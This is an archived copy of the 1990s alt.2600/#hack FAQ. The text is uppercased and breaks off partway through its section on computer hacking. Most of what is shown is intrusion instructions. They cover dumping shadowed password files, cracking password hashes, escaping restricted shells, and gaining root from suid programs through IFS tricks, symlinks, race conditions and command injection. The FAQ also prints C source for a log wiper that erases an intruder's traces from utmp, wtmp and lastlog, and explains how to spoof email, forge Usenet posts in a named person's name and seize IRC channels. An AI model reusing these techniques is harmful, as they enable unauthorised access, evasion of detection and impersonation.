💾 Archived View for spam.works › mirrors › textfiles › hacking › hack.faq captured on 2023-11-14 at 09:51:51.
⬅️ Previous capture (2023-06-14)
-=-=-=-=-=-=-
#hack FAQ #HACK FAQ EDITORS NOTE: WELCOME TO BETA .008 OF THE ALT.2600/#HACK FAQ! THE FAQ SUFFERED FROM A FLOPPY DISK CRASH. I BELIEVE I HAVE CORRECTED ALL ERRORS RESULTING FROM THE CRASH. IF YOU FIND ANY THAT I MISSED, PLEASE E-MAIL ME. THIS EDITION OF THE FAQ IS DEDICATED TO TARAN KING, WHO HAS PUT IN MANY LONG HOURS KEEPING THE HTML VERSION OF THIS DOCUMENT UP TO DATE. IF YOU HAVE A QUESTIONS REGARDING ANY OF THE TOPICS COVERED IN THE FAQ, PLEASE DIRECT IT TO ALT.2600 OR #HACK. PLEASE DO NOT E-MAIL ME WITH THEM, I'M GETTING SWAMPED. IF YOUR COPY OF THE #HACK FAQ DOES NOT END WITH THE #hack FAQ (24/25) LETTERS EOT ON A LINE BY THEMSELVES, YOU DO NOT HAVE THE ENTIRE FAQ. THANKS GO OUT TO BORIS GINSBURGS FOR HIS WORK IN SPELL CHECKING THE FAQ! ** BETA ** BETA REVISION .008 #hack FAQ (24/47) ALT.2600/#HACK F.A.Q. BY VOYAGER WILL@GNU.AI.MIT.EDU SYSOP OF #hack FAQ (27/72) HACKER'S HAVEN (303)343-4053 WITH SPECIAL THANKS TO: A-FLAT, AL, ALEPH1, BLUESMAN, C-CURVE, EDISON, KCROW, MAJOR, PRESENCE, ROGUE AGENT, SBIN, TARAN KING, TOMES AND THESAINT. WE WORK IN THE DARK #hack FAQ (27/94) WE DO WHAT WE CAN WE GIVE WHAT WE HAVE OUR DOUBT IS OUR PASSION, AND OUR PASSION IS OUR TASK THE REST IS THE MADNESS OF ART. -- HENRY JAMES #hack FAQ (27/116) SECTION A: COMPUTERS 01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX? 02. HOW DO I CRACK UNIX PASSWORDS? 03. WHAT IS PASSWORD SHADOWING? N 04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED? 05. WHAT IS NIS/YP? N 06. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE? 07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS? 08. HOW DO I CRACK VMS PASSWORDS? 09. HOW DO I BREAK OUT OF A RESTRICTED SHELL? 10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM? 11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS? 12. HOW DO I SEND FAKEMAIL? 13. HOW DO I FAKE POSTS TO USENET? 14. HOW DO I HACK CHANOP ON IRC? 15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME? 16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM? U 17. WHAT IS ETHERNET SNIFFING? 18. WHAT IS AN INTERNET OUTDIAL? 19. WHAT ARE SOME INTERNET OUTDIALS? U 20. WHAT IS THIS SYSTEM? #hack FAQ (27/138) U 21. WHAT ARE THE DEFAULT ACCOUNTS FOR XXX ? U 22. WHAT PORT IS XXX ON? 23. WHAT IS A TROJAN/WORM/VIRUS/LOGIC BOMB? 24. HOW CAN I PROTECT MYSELF FROM VIRII AND SUCH? 25. WHAT IS CRYPTOXXXXXXX? 26. WHAT IS PGP? 27. WHAT IS TEMPEST? 28. WHAT IS AN ANONYMOUS REMAILER? 29. WHAT ARE THE ADDRESSES OF SOME ANONYMOUS REMAILERS? 30. HOW DO I DEFEAT COPY PROTECTION? SECTION B: TELEPHONY 01. WHAT IS A RED BOX? 02. HOW DO I BUILD A RED BOX? U 03. WHERE CAN I GET A 6.5536MHZ CRYSTAL? 04. WHICH PAYPHONES WILL A RED BOX WORK ON? 05. WHAT IS A BLUE BOX? 06. DO BLUE BOXES STILL WORK? 07. WHAT IS A BLACK BOX? 08. WHAT DO ALL THE COLORED BOXES DO? #hack FAQ (27/160) N 09. WHAT IS AN ANAC NUMBER? U 10. WHAT IS THE ANAC NUMBER FOR MY AREA? 11. WHAT IS A RINGBACK NUMBER? 12. WHAT IS THE RINGBACK NUMBER FOR MY AREA? 13. WHAT IS A LOOP? 14. WHAT IS A LOOP IN MY AREA? U 15. WHAT IS A CNA NUMBER? 16. WHAT IS THE TELEPHONE COMPANY CNA NUMBER FOR MY AREA? N 17. WHAT ARE SOME NUMBERS THAT ALWAYS RING BUSY? N 18. WHAT ARE SOME NUMBERS THAT TEMPORARILY DISCONNECT PHONE SERVICE? 19. WHAT IS SCANNING? 20. IS SCANNING ILLEGAL? U 21. WHERE CAN I PURCHASE A LINEMAN'S HANDSET? 22. WHAT ARE THE DTMF FREQUENCIES? N 23. WHAT ARE ALL OF THE * CODES? N 24. WHAT FREQUENCIES DO CORDLESS PHONES OPERATE ON? SECTION C: RESOURCES U 01. WHAT ARE SOME FTP SITES OF INTEREST TO HACKERS? U 02. WHAT ARE SOME NEWSGROUPS OF INTEREST TO HACKERS? #hack FAQ (27/182) 03. WHAT ARE SOME TELNET SITES OF INTEREST TO HACKERS? 04. WHAT ARE SOME GOPHER SITES OF INTEREST TO HACKERS? U 05. WHAT ARE SOME WORLD WIDE WEB (WWW) SITES OF INTEREST TO HACKERS? 06. WHAT ARE SOME IRC CHANNELS OF INTEREST TO HACKERS? U 07. WHAT ARE SOME BBS'S OF INTEREST TO HACKERS? 08. WHAT BOOKS ARE AVAILABLE ON THIS SUBJECT? 09. WHAT ARE SOME MAILING LISTS OF INTEREST TO HACKERS? U 10. WHAT ARE SOME PRINT MAGAZINES OF INTEREST TO HACKERS? 11. WHAT ARE SOME ORGANIZATIONS OF INTEREST TO HACKERS? N 12. WHERE CAN I PURCHASE A MAGNETIC STRIPE ENCODER/DECODER? SECTION D: 2600 01. WHAT IS ALT.2600? 02. WHAT DOES "2600" MEAN? 03. ARE THERE ON-LINE VERSIONS OF 2600 AVAILABLE? 04. I CAN'T FIND 2600 AT ANY BOOKSTORES. WHAT CAN I DO? U 05. WHY DOES 2600 COST MORE TO SUBSCRIBE TO THAN TO BUY AT A NEWSSTAND? SECTION E: MISCELLANEOUS #hack FAQ (27/204) U 01. WHAT DOES XXX STAND FOR? 02. HOW DO I DETERMINE IF I HAVE A VALID CREDIT CARD NUMBER? 03. WHERE CAN I GET A COPY OF THE #HACK FAQ? N 04. WHAT ARE THE ETHICS OF HACKING? U == UPDATED SINCE LAST RELEASE OF THE #HACK FAQ N == NEW SINCE LAST RELEASE OF THE #HACK FAQ SECTION A: COMPUTERS ~~~~~~~~~~~~~~~~~~~~ 01. HOW DO I ACCESS THE PASSWORD FILE UNDER UNIX? IN STANDARD UNIX THE PASSWORD FILE IS /ETC/PASSWD. ON A UNIX SYSTEM WITH EITHER NIS/YP OR PASSWORD SHADOWING, MUCH OF THE PASSWORD DATA MAY BE ELSEWHERE. #hack FAQ (28/227) 02. HOW DO I CRACK UNIX PASSWORDS? CONTRARY TO POPULAR BELIEF, UNIX PASSWORDS CANNOT BE DECRYPTED. UNIX PASSWORDS ARE ENCRYPTED WITH A ONE WAY FUNCTION. THE LOGIN PROGRAM ENCRYPTS THE TEXT YOU ENTER AT THE "PASSWORD:" PROMPT AND COMPARES THAT ENCRYPTED STRING AGAINST THE ENCRYPTED FORM OF YOUR PASSWORD. PASSWORD CRACKING SOFTWARE USES WORDLISTS. EACH WORD IN THE WORDLIST IS ENCRYPTED WITH EACH OF THE 4096 POSSIBLE SALT VALUES AND THE RESULTS ARE COMPARED TO THE ENCRYPTED FORM OF THE TARGET PASSWORD. THE BEST CRACKING PROGRAM FOR UNIX PASSWORDS IS CURRENTLY CRACK BY ALEC MUFFETT. FOR PC-DOS, THE BEST PACKAGE TO USE IS CURRENTLY CRACKERJACK. 03. WHAT IS PASSWORD SHADOWING? PASSWORD SHADOWING IS A SECURITY SYSTEM WHERE THE ENCRYPTED PASSWORD FIELD OF /ETC/PASSWORD IS REPLACED WITH A SPECIAL TOKEN AND THE ENCRYPTED PASSWORD IS STORED IN A SEPARATE FILE WHICH IS NOT READABLE BY NORMAL SYSTEM USERS. #hack FAQ (29/250) TO DEFEAT PASSWORD SHADOWING ON MANY (BUT NOT ALL) SYSTEMS, WRITE A PROGRAM THAT USES SUCCESSIVE CALLS TO GETPWENT() TO OBTAIN THE PASSWORD FILE. EXAMPLE: #INCLUDE MAIN() { STRUCT PASSWD *P; WHILE(P=GETPWENT()) PRINTF("%S:%S:%D:%D:%S:%S:%S\N", P->PW_NAME, P->PW_PASSWD, P->PW_UID, P->PW_GID, P->PW_GECOS, P->PW_DIR, P->PW_SHELL); } 04. WHERE CAN I FIND THE PASSWORD FILE IF IT'S SHADOWED? UNIX PATH TOKEN ----------------------------------------------------------------- AIX 3 /ETC/SECURITY/PASSWD ! OR /TCB/AUTH/FILES// #hack FAQ (29/272) A/UX 3.0S /TCB/FILES/AUTH/?/* BSD4.3-RENO /ETC/MASTER.PASSWD * CONVEXOS 10 /ETC/SHADPW * CONVEXOS 11 /ETC/SHADOW * DG/UX /ETC/TCB/AA/USER/ * EP/IX /ETC/SHADOW X HP-UX /.SECURE/ETC/PASSWD * IRIX 5 /ETC/SHADOW X LINUX 0.99 /ETC/SHADOW * OSF/1 /ETC/PASSWD[.DIR|.PAG] * SCO UNIX #.2.X /TCB/AUTH/FILES// SUNOS4.1+C2 /ETC/SECURITY/PASSWD.ADJUNCT ##USERNAME SUNOS 5.0 /ETC/SHADOW SYSTEM V RELEASE 4.0 /ETC/SHADOW X SYSTEM V RELEASE 4.2 /ETC/SECURITY/* DATABASE ULTRIX 4 /ETC/AUTH[.DIR|.PAG] * UNICOS /ETC/UDB * 06. WHAT IS NIS/YP? #hack FAQ (29/294) NIS (NETWORK INFORMATION SYSTEM) IN THE CURRENT NAME FOR WHAT WAS ONCE KNOWN AS YP (YELLOW PAGES). THE PURPOSE FOR NIS IS TO ALLOW MANY MACHINES ON A NETWORK TO SHARE CONFIGURATION INFORMATION, INCLUDING PASSWORD DATA. NIS IS NOT DESIGNED TO PROMOTE SYSTEM SECURITY. IF YOUR SYSTEM USES NIS YOU WILL HAVE A VERY SHORT /ETC/PASSWD FILE WITH A LINE THAT LOOKS LIKE THIS: +::0:0::: TO VIEW THE REAL PASSWORD FILE USE THIS COMMAND "YPCAT PASSWD" 05. WHAT ARE THOSE WEIRD CHARACTERS AFTER THE COMMA IN MY PASSWD FILE? THE CHARACTERS ARE PASSWORD AGING DATA. PASSWORD AGING FORCES THE USER TO CHANGE PASSWORDS AFTER A SYSTEM ADMINISTRATOR SPECIFIED PERIOD OF TIME. PASSWORD AGING CAN ALSO FORCE A USER TO KEEP A PASSWORD FOR A CERTAIN NUMBER OF WEEKS BEFORE CHANGING IT. ] ] SAMPLE ENTRY FROM /ETC/PASSWD WITH PASSWORD AGING INSTALLED: ] #hack FAQ (29/316) ] WILL:5FG63FHD3D,M.Z8:9406:12:WILL SPENCER:/HOME/FSG/WILL:/BIN/BASH ] NOTE THE COMMA IN THE ENCRYPTED PASSWORD FIELD. THE CHARACTERS AFTER THE COMMA ARE USED BY THE PASSWORD AGING MECHANISM. ] ] PASSWORD AGING CHARACTERS FROM ABOVE EXAMPLE: ] ] M.Z8 ] THE FOUR CHARACTERS ARE INTERPRETED AS FOLLOWS: 1: MAXIMUM NUMBER OF WEEKS A PASSWORD CAN BE USED WITHOUT CHANGING. 2: MINIMUM NUMBER OF WEEKS A PASSWORD MUST BE USED BEFORE CHANGING. 3&4: LAST TIME PASSWORD WAS CHANGED, IN NUMBER OF WEEKS SINCE 1970. THREE SPECIAL CASES SHOULD BE NOTED: IF THE FIRST AND SECOND CHARACTERS ARE SET TO '..' THE USER WILL BE FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN. THE #hack FAQ (29/338) PASSWD PROGRAM WILL THEN REMOVE THE PASSWD AGING CHARACTERS, AND THE USER WILL NOT BE SUBJECTED TO PASSWORD AGING REQUIREMENTS AGAIN. IF THE THIRD AND FOURTH CHARACTERS ARE SET TO '..' THE USER WILL BE FORCED TO CHANGE HIS/HER PASSWD THE NEXT TIME HE/SHE LOGS IN. PASSWORD AGING WILL THEN OCCUR AS DEFINED BY THE FIRST AND SECOND CHARACTERS. IF THE FIRST CHARACTER (MAX) IS LESS THAN THE SECOND CHARACTER (MIN), THE USER IS NOT ALLOWED TO CHANGE HIS/HER PASSWORD. ONLY ROOT CAN CHANGE THAT USERS PASSWORD. IT SHOULD ALSO BE NOTED THAT THE SU COMMAND DOES NOT CHECK THE PASSWORD AGING DATA. AN ACCOUNT WITH AN EXPIRED PASSWORD CAN BE SU'D TO WITHOUT BEING FORCED TO CHANGE THE PASSWORD. PASSWORD AGING CODES +------------------------------------------------------------------------+ | | | CHARACTER: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | NUMBER: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | #hack FAQ (29/360) | CHARACTER: I J K L M N O P Q R S T U V W X Y Z A B | | NUMBER: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | CHARACTER: C D E F G H I J K L M N O P Q R S T U V | | NUMBER: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | CHARACTER: W X Y Z | | NUMBER: 60 61 62 63 | | | +------------------------------------------------------------------------+ 07. HOW DO I ACCESS THE PASSWORD FILE UNDER VMS? UNDER VMS, THE PASSWORD FILE IS SYS$SYSTEM:SYSUAF.DAT. HOWEVER, UNLIKE UNIX, MOST USERS DO NOT HAVE ACCESS TO READ THE PASSWORD FILE. 08. HOW DO I CRACK VMS PASSWORDS? WRITE A PROGRAM THAT USES THE SYS$GETUAF FUNCTIONS TO COMPARE THE RESULTS OF ENCRYPTED WORDS AGAINST THE ENCRYPTED DATA IN SYSUAF.DAT. #hack FAQ (30/383) TWO SUCH PROGRAMS ARE KNOWN TO EXIST, CHECK_PASSWORD AND GUESS_PASSWORD. 09. HOW DO I BREAK OUT OF A RESTRICTED SHELL? ON POORLY IMPLEMENTED RESTRICTED SHELLS YOU CAN BREAK OUT OF THE RESTRICTED ENVIRONMENT BY RUNNING A PROGRAM THAT FEATURES A SHELL FUNCTION. A GOOD EXAMPLE IS VI. RUN VI AND USE THIS COMMAND: :SET SHELL=/BIN/SH THEN SHELL USING THIS COMMAND: :SHELL 10. HOW DO I GAIN ROOT FROM A SUID SCRIPT OR PROGRAM? 1. CHANGE IFS. IF THE PROGRAM CALLS ANY OTHER PROGRAMS USING THE SYSTEM() FUNCTION #hack FAQ (30/405) CALL, YOU MAY BE ABLE TO FOOL IT BY CHANGING IFS. IFS IS THE INTERNAL FIELD SEPARATOR THAT THE SHELL USES TO DELIMIT ARGUMENTS. IF THE PROGRAM CONTAINS A LINE THAT LOOKS LIKE THIS: SYSTEM("/BIN/DATE") AND YOU CHANGE IFS TO '/' THE SHELL WILL THEM INTERPRET THE PROCEEDING LINE AS: BIN DATE NOW, IF YOU HAVE A PROGRAM OF YOUR OWN IN THE PATH CALLED "BIN" THE SUID PROGRAM WILL RUN YOUR PROGRAM INSTEAD OF /BIN/DATE. TO CHANGE IFS, USE THIS COMMAND: IFS='/';EXPORT IFS # BOURNE SHELL SETENV IFS '/' # C SHELL EXPORT IFS='/' # KORN SHELL #hack FAQ (30/427) 2. LINK THE SCRIPT TO -I CREATE A SYMBOLIC LINK NAMED "-I" TO THE PROGRAM. RUNNING "-I" WILL CAUSE THE INTERPRETER SHELL (/BIN/SH) TO START UP IN INTERACTIVE MODE. THIS ONLY WORKS ON SUID SHELL SCRIPTS. EXAMPLE: % LN SUID.SH -I % -I # 3. EXPLOIT A RACE CONDITION REPLACE A SYMBOLIC LINK TO THE PROGRAM WITH ANOTHER PROGRAM WHILE THE KERNEL IS LOADING /BIN/SH. EXAMPLE: NICE -19 SUIDPROG ; LN -S EVILPROG SUIDROOT #hack FAQ (31/450) 4. SEND BAD INPUT TO THE PROGRAM. INVOKE THE NAME OF THE PROGRAM AND A SEPARATE COMMAND ON THE SAME COMMAND LINE. EXAMPLE: SUIDPROG ; ID 11. HOW DO I ERASE MY PRESENCE FROM THE SYSTEM LOGS? EDIT /ETC/UTMP, /USR/ADM/WTMP AND /USR/ADM/LASTLOG. THESE ARE NOT TEXT FILES THAT CAN BE EDITED BY HAND WITH VI, YOU MUST USE A PROGRAM SPECIFICALLY WRITTEN FOR THIS PURPOSE. EXAMPLE: #INCLUDE #INCLUDE #INCLUDE #INCLUDE #hack FAQ (31/472) #INCLUDE #INCLUDE #INCLUDE #INCLUDE #DEFINE WTMP_NAME "/USR/ADM/WTMP" #DEFINE UTMP_NAME "/ETC/UTMP" #DEFINE LASTLOG_NAME "/USR/ADM/LASTLOG" INT F; VOID KILL_UTMP(WHO) CHAR *WHO; { STRUCT UTMP UTMP_ENT; IF ((F=OPEN(UTMP_NAME,O_RDWR))>=0) { WHILE(READ (F, &UTMP_ENT, SIZEOF (UTMP_ENT))> 0 ) IF (!STRNCMP(UTMP_ENT.UT_NAME,WHO,STRLEN(WHO))) { BZERO((CHAR *)&UTMP_ENT,SIZEOF( UTMP_ENT )); LSEEK (F, -(SIZEOF (UTMP_ENT)), SEEK_CUR); WRITE (F, &UTMP_ENT, SIZEOF (UTMP_ENT)); } #hack FAQ (31/494) CLOSE(F); } } VOID KILL_WTMP(WHO) CHAR *WHO; { STRUCT UTMP UTMP_ENT; LONG POS; POS = 1L; IF ((F=OPEN(WTMP_NAME,O_RDWR))>=0) { WHILE(POS != -1L) { LSEEK(F,-(LONG)( (SIZEOF(STRUCT UTMP)) * POS),L_XTND); IF (READ (F, &UTMP_ENT, SIZEOF (STRUCT UTMP))= 0) { LSEEK(F, (LONG)PWD->PW_UID * SIZEOF (STRUCT LASTLOG), 0); BZERO((CHAR *)&NEWLL,SIZEOF( NEWLL )); WRITE(F, (CHAR *)&NEWLL, SIZEOF( NEWLL )); CLOSE(F); } #hack FAQ (31/516) } ELSE PRINTF("%S: ?\N",WHO); } MAIN(ARGC,ARGV) INT ARGC; CHAR *ARGV[]; { IF (ARGC==2) { KILL_LASTLOG(ARGV[1]); KILL_WTMP(ARGV[1]); KILL_UTMP(ARGV[1]); PRINTF("ZAP2!\N"); } ELSE PRINTF("ERROR.\N"); } 12. HOW DO I SEND FAKEMAIL? TELNET TO PORT 25 OF THE MACHINE YOU WANT THE MAIL TO APPEAR TO ORIGINATE FROM. ENTER YOUR MESSAGE AS IN THIS EXAMPLE: #hack FAQ (31/538) HELO BELLCORE.COM MAIL FROM:VOYAGER@BELLCORE.COM RCPT TO:PRESIDENT@WHITEHOUSE.GOV DATA PLEASE DISCONTINUE YOUR SILLY CLIPPER INITIATIVE. . QUIT ON SYSTEMS THAT HAVE RFC 931 IMPLEMENTED, SPOOFING YOUR "MAIL FROM:" LINE WILL NOT WORK. TEST BY SENDING YOURSELF FAKEMAIL FIRST. 13. HOW DO I FAKE POSTS TO USENET? USE INEWS TO POST. GIVE INEWS THE FOLLOWING LINES: FROM: NEWSGROUPS: SUBJECT: MESSAGE-ID: #hack FAQ (31/560) DATE: ORGANIZATION: FOR A MODERATED NEWSGROUP, INEWS WILL ALSO REQUIRE THIS LINE: APPROVED: THEN ADD YOUR POST AND TERMINATE WITH . EXAMPLE: FROM: ERIC S. REAL NEWSGROUPS: ALT.HACKERS SUBJECT: PATHETIC BUNCH OF WANNABE LOSERS MESSAGE-ID: DATE: FRI, 13 AUG 1994 12:15:03 ORGANIZATION: MORAL MAJORITY A PATHETIC BUNCH OF WANNABE LOSERS IS WHAT MOST OF YOU ARE, WITH NO RIGHT TO STEAL THE HONORABLE TITLE OF `HACKER' TO PUFF UP YOUR SILLY ADOLESCENT EGOS. GET STUFFED, GET LOST, AND GO TO JAIL. #hack FAQ (36/587) ERIC S. RAYMOND ^D NOTE THAT MANY SYSTEMS WILL APPEND AN ORIGINATOR: LINE TO YOUR MESSAGE HEADER, EFFECTIVELY REVEALING THE ACCOUNT FROM WHICH THE MESSAGE WAS POSTED. 14. HOW DO I HACK CHANOP ON IRC? FIND A SERVER THAT IS SPLIT FROM THE REST OF IRC AND CREATE YOUR OWN CHANNEL THERE USING THE NAME OF THE CHANNEL YOU WANT CHANOP ON. WHEN THAT SERVER RECONNECTS TO THE NET, YOU WILL HAVE CHANOP ON THE REAL CHANNEL. IF YOU HAVE SERVEROP ON A SERVER, YOU CAN CAUSE IT TO SPLIT ON PURPOSE. 15. HOW DO I MODIFY THE IRC CLIENT TO HIDE MY REAL USERNAME? GET THE IRC CLIENT FROM CS.BU.EDU /IRC/CLIENTS. LOOK AT THE SOURCE #hack FAQ (36/609) CODE FILES IRC.C AND CTCP.C. THE CODE YOU ARE LOOKING FOR IS FAIRLY EASY TO SPOT. CHANGE IT. CHANGE THE USERNAME CODE IN IRC.C AND THE CTCP INFORMATION CODE IN CTCP.C. COMPILE AND RUN YOUR CLIENT. HERE ARE THE DIFFS FROM A SAMPLE HACK OF THE IRC CLIENT. YOUR CLIENT CODE WILL VARY SLIGHTLY DEPENDING ON WHAT IRC CLIENT VERSION YOU ARE RUNNING. *** CTCP.C.OLD WED FEB 10 10:08:05 1993 --- CTCP.C FRI FEB 12 04:33:55 1993 *************** *** 331,337 **** STRUCT PASSWD *PWD; LONG DIFF; INT UID; ! CHAR C; /* #hack FAQ (37/632) * SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS' --- 331,337 ---- STRUCT PASSWD *PWD; LONG DIFF; INT UID; ! CHAR C, *FING; /* * SOJGE COMPLAINED THAT IRCII SAYS 'IDLE 1 SECONDS' *************** *** 348,354 **** IF (UID != DAEMON_UID) { #ENDIF /* DAEMON_UID */ ! IF (PWD = GETPWUID(UID)) #hack FAQ (39/656) { CHAR *TMP; --- 348,356 ---- IF (UID != DAEMON_UID) { #ENDIF /* DAEMON_UID */ ! IF (FING = GETENV("IRCFINGER")) ! SEND_CTCP_REPLY(FROM, CTCP->NAME, FING, DIFF, C); ! ELSE IF (PWD = GETPWUID(UID)) { CHAR *TMP; #hack FAQ (40/679) *** IRC.C.OLD WED FEB 10 06:33:11 1993 --- IRC.C FRI FEB 12 04:02:11 1993 *************** *** 510,516 **** MALLOC_STRCPY(&MY_PATH, "/"); IF (*REALNAME == NULL(CHAR)) STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN); ! IF (*USERNAME == NULL(CHAR)) { IF (PTR = GETENV("USER")) STRMCPY(USERNAME, PTR, NAME_LEN); #hack FAQ (40/701) --- 510,518 ---- MALLOC_STRCPY(&MY_PATH, "/"); IF (*REALNAME == NULL(CHAR)) STRMCPY(REALNAME, "*UNKNOWN*", REALNAME_LEN); ! IF (PTR = GETENV("IRCUSER")) ! STRMCPY(USERNAME, PTR, NAME_LEN); ! ELSE IF (*USERNAME == NULL(CHAR)) { IF (PTR = GETENV("USER")) STRMCPY(USERNAME, PTR, NAME_LEN); #hack FAQ (41/724) 16. HOW TO I CHANGE TO DIRECTORIES WITH STRANGE CHARACTERS IN THEM? THESE DIRECTORIES ARE OFTEN USED BY PEOPLE TRYING TO HIDE INFORMATION, MOST OFTEN WAREZ (COMMERCIAL SOFTWARE). THERE ARE SEVERAL THINGS YOU CAN DO TO DETERMINE WHAT THESE STRANGE CHARACTERS ARE. ONE IS TO USE THE ARGUMENTS TO THE LS COMMAND THAT CAUSE LS TO GIVE YOU MORE INFORMATION: FROM THE MAN PAGE FOR LS: -F CAUSES DIRECTORIES TO BE MARKED WITH A TRAILING ``/'', EXECUTABLE FILES TO BE MARKED WITH A TRAILING ``*'', AND SYMBOLIC LINKS TO BE MARKED WITH A TRAILING ``@'' SYMBOL. -Q FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN FILENAMES AS THE CHARACTER ``?''. -B FORCES PRINTING OF NON-GRAPHIC CHARACTERS IN THE \DDD #hack FAQ (42/747) NOTATION, IN OCTAL. PERHAPS THE MOST USEFUL TOOL IS TO SIMPLY DO AN "LS -AL FILENAME" TO SAVE THE DIRECTORY OF THE REMOTE FTP SITE AS A FILE ON YOUR LOCAL MACHINE. THEN YOU CAN DO A "CAT -T -V -E FILENAME" TOO SEE EXACTLY WHAT THOSE BIZARRE LITTLE CHARACTERS ARE. FROM THE MAN PAGE FOR CAT: -V CAUSES NON-PRINTING CHARACTERS (WITH THE EXCEPTION OF TABS, NEWLINES, AND FORM FEEDS) TO BE DISPLAYED. CONTROL CHARACTERS ARE DISPLAYED AS ^X (X), WHERE X IS THE KEY PRESSED WITH THE KEY (FOR EXAMPLE, M IS DISPLAYED AS ^M). THE CHARACTER (OCTAL 0177) IS PRINTED AS ^?. NON-ASCII CHARACTERS (WITH THE HIGH BIT SET) ARE PRINTED AS M -X, WHERE X IS THE CHARACTER SPECIFIED BY THE SEVEN LOW ORDER BITS. #hack FAQ (43/770) -T CAUSES TABS TO BE PRINTED AS ^I AND FORM FEEDS AS ^L. THIS OPTION IS IGNORED IF THE -V OPTION IS NOT SPECIFIED. -E CAUSES A ``